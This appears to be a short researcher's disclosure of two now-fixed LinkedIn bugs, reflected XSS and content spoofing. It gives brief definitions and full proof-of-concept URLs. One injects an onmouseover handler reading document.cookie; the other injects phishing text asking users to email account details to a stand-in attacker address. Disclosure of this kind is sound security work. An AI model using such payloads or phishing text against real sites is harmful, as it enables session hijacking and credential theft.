Couple of days back, I reported XSS and Content Spoofing on LinkedIn. Here are the details of the issues.
Cross Site Scripting:
What is Cross Site Scripting?
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user’s credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.
URL: http://www.linkedin.com/contacts/services/linkedin_connect_div_without_contact_id/?invitee_linkedin_id=30680542&profile_image_url=http://www.niiconsulting.com/img/NIILogo.png%20width=400%20height=400%20onmouseover=alert(document.cookie);&name=Sunil&first_name=Yadav&headline=&_=1382600845381
Vulnerable Parameter: profile_image_url
Content Spoofing
What is Content Spoofing?
Content spoofing, also referred to as content injection or virtual defacement, is an attack targeting a user made possible by injection vulnerability in a web application. When an application does not properly handle user supplied data, an attacker can supply content to a web application, typically via a parameter value, that is reflected back to the user. This presents the user with a modified page under the context of the trusted domain.
URL: http://www.linkedin.com/contacts/services/linkedin_connect_div_without_contact_id/?invitee_linkedin_id=30680542&profile_image_url=http://www.niiconsulting.com/img/NIILogo.png%20width=400 height=400&name=:%20We%20had%20a%20major%20data%20breach%20at%20our%20data%20centre.%20That%20was%20result%20of%20an%20internal%20administrator%20error%20where%20we%20lost%20all%20our%20customer%20records.%20We%20request%20to%20reset%20your%20password%20here%20or%20email%20us%20your%20account%20details%20at%20attacker@attacker1.com%20.Please%20do%20it%20on%20priority%20basis%20and%20if%20you%20do%20not%20reset%20you%20password,%20you%20will%20loose%20your%20account.&first_name=:%20We%20had%20a%20major%20data%20breach%20at%20our%20data%20centre.%20That%20was%20result%20of%20an%20internal%20administrator%20error%20where%20we%20lost%20all%20our%20customer%20records.%20We%20request%20to%20reset%20your%20password%20here%20or%20email%20us%20your%20account%20details%20at%20attacker@attacker1.com%20.Please%20do%20it%20on%20priority%20basis%20and%20if%20you%20do%20not%20reset%20you%20password,%20you%20will%20loose%20your%20account.&headline=:%20We%20had%20a%20major%20data%20breach%20at%20our%20data%20centre.%20That%20was%20result%20of%20an%20internal%20administrator%20error%20where%20we%20lost%20all%20our%20customer%20records.%20We%20request%20to%20reset%20your%20password%20here%20or%20email%20us%20your%20account%20details%20at%20attacker@attacker1.com%20.Please%20do%20it%20on%20priority%20basis%20and%20if%20you%20do%20not%20reset%20you%20password,%20you%20will%20loose%20your%20account.&_=1382600845381
Vulnerable Parameters: profile_image_url,name,first_name,headline
Both the issues were fixed in a matter of time. Thank You, Linked Security Team 🙂
Anonymous